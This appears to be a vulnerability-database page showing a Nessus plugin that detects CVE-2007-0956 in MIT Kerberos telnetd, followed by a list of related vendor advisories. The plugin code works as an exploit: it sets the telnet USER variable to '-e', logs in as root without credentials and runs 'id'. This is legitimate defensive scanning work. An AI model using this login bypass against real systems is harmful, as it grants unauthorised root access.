Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.KRB_TELNET_ENV.NASL
HistoryApr 05, 2007 - 12:00 a.m.

Kerberos telnet Crafted Username Remote Authentication Bypass

2007-04-0500:00:00
This script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
29
JSON

An authentication bypass vulnerability exists in the MIT krb5 telnet daemon due to a failure to sanitize malformed usernames. This allows usernames beginning with ‘-e’ to be interpreted as a command-line flag by the login.krb5 program. A remote attacker can exploit this, via a crafted username, to cause login.krb5 to execute part of the BSD rlogin protocol, which in turn allows the attacker to login with an arbitrary username without a password or any further authentication.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

# Need Nessus 2.2.9 or newer
if (NASL_LEVEL < 2204 ) exit(0);

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(24998);
  script_version("1.29");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2007-0956");
  script_bugtraq_id(23281);
  script_xref(name:"CERT", value:"220816");

  script_name(english:"Kerberos telnet Crafted Username Remote Authentication Bypass");

  script_set_attribute(attribute:"synopsis", value:
"It is possible to log into the remote host using telnet without
supplying any credentials.");
  script_set_attribute(attribute:"description", value:
"An authentication bypass vulnerability exists in the MIT krb5 telnet
daemon due to a failure to sanitize malformed usernames. This allows
usernames beginning with '-e' to be interpreted as a command-line flag
by the login.krb5 program. A remote attacker can exploit this, via a
crafted username, to cause login.krb5 to execute part of the BSD
rlogin protocol, which in turn allows the attacker to login with an
arbitrary username without a password or any further authentication.");
  # http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0ed21002");
  script_set_attribute(attribute:"solution", value:
"Apply the fixes described in MIT krb5 Security Advisory 2007-001, or
contact your vendor for a patch.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/04/03");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/04/05");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mit:kerberos");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("find_service1.nasl");
  script_exclude_keys("global_settings/supplied_logins_only");
  script_require_ports("Services/telnet", 23);

  exit(0);
}

include ("global_settings.inc");
include ("audit.inc");
include ("byte_func.inc");
include ("telnet2_func.inc");
include("data_protection.inc");

if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

port = get_kb_item("Services/telnet");
if (!port) port = 23;

global_var rcvdata, idsent, idstate;

function local_telnet_callback ()
{
 local_var data;
 data = _FCT_ANON_ARGS[0];

 if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d)
   rcvdata += data[0];


 if ( (idstate == 0 && (egrep(pattern:"login:", string:rcvdata, icase:TRUE))) || 
      egrep(pattern:"(password|usage):", string:rcvdata, icase:TRUE) )
 {
  exit(0);
 }

 if (idstate == 0)
 {
  telnet_write('plop\r\0');
  telnet_write('\0\r\0');
  rcvdata = NULL;
  idstate = 1;
 } 

 if (idstate == 1 && "login: login:" >< rcvdata)
 {
  rcvdata = NULL;
  telnet_write('root\r\0');
  telnet_write('id\r\0');
  idstate = 2;
 }

 if (idstate == 2 && "uid=" >< rcvdata)
 {
  security_hole(port:port, extra:'It was possible to log in and execute "id" : \n\n' + data_protection::sanitize_uid(output:egrep(pattern:"uid=", string:rcvdata)));
  telnet_write('exit\r\0');
  exit(0);
 }
}


rcvdata = NULL;
idstate = 0;

env_data = 
	mkbyte(0) +
	mkbyte(0) + "USER" +
	mkbyte(1) + "-e";

options = NULL;
options[0] = make_list(OPT_NEW_ENV, env_data);

if (!telnet2_init(options:options, timeout:10))
  exit(0);

telnet_loop(telnet_callback_fn:@local_telnet_callback);
VendorProductVersionCPE
mitkerberoscpe:/a:mit:kerberos

Related

nessus 12
d2 1
cert 1
prion 1
securityvulns 2
ubuntucve 1
cve 1
debiancve 1
openvas 25
suse 1
fedora 7
centos 2
gentoo 1
osv 1
redhat 1
ubuntu 1
debian 1
oraclelinux 1
vmware 1
nessus
nessus
Solaris 9 (sparc) : 116462-06
2006-11-06 00:00:00
Solaris 5.9 (x86) : 119796-04
2006-11-06 00:00:00
SuSE 10 Security Update : krb5-apps-servers (ZYPP Patch Number 3022)
2007-12-13 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_KRB5_TELNETD
2007-04-06 01:19:00
cert
cert
MIT Kerberos 5 telnet daemon allows login as arbitrary user
2007-04-03 00:00:00
prion
prion
Authentication flaw
2007-04-06 01:19:00
securityvulns
securityvulns
MITKRB5-SA-2007-001: telnetd allows login as arbitrary user [CVE-2007-0956]
2007-04-04 00:00:00
Mltiple MIT Kerberos security vulnerabilities
2007-04-11 00:00:00
ubuntucve
ubuntucve
CVE-2007-0956
2007-04-06 00:00:00
cve
cve
CVE-2007-0956
2007-04-06 01:19:00
debiancve
debiancve
CVE-2007-0956
2007-04-06 01:19:00
openvas
openvas
Mandriva Update for krb5 MDKSA-2007:077-1 (krb5)
2009-04-09 00:00:00
SuSE Update for krb5 SUSE-SA:2007:025
2009-01-28 00:00:00
Debian Security Advisory DSA 1276-1 (krb5)
2008-01-17 00:00:00
suse
suse
remote code execution in krb5
2007-04-05 12:20:17
fedora
fedora
[SECURITY] Fedora Core 6 Update: krb5-1.5-21
2007-04-03 20:13:33
[SECURITY] Fedora Core 5 Update: krb5-1.4.3-5.4
2007-04-03 20:14:48
[SECURITY] Fedora 7 Update: krb5-1.6.1-2.1.fc7
2007-06-28 01:54:45
centos
centos
krb5 security update
2007-04-03 21:56:56
krb5 security update
2007-04-04 00:33:54
gentoo
gentoo
MIT Kerberos 5: Arbitrary remote code execution
2007-04-03 00:00:00
osv
osv
krb5 - several vulnerabilities
2007-04-03 00:00:00
redhat
redhat
(RHSA-2007:0095) Critical: krb5 security update
2007-04-03 00:00:00
ubuntu
ubuntu
krb5 vulnerabilities
2007-04-04 00:00:00
debian
debian
[SECURITY] [DSA 1276-1] New krb5 packages fix several vulnerabilities
2007-04-03 21:15:24
oraclelinux
oraclelinux
Critical: krb5 security update
2007-04-04 00:00:00
vmware
vmware
Updated Service Console packages (XFree86, UP and SMP kernels, Kerberos libraries) resolve security issues.
2007-07-05 00:00:00
JSON
Related for KRB_TELNET_ENV.NASL
nessus12d21cert1prion1securityvulns2ubuntucve1cve1debiancve1openvas25suse1fedora7centos2gentoo1osv1redhat1ubuntu1debian1oraclelinux1vmware1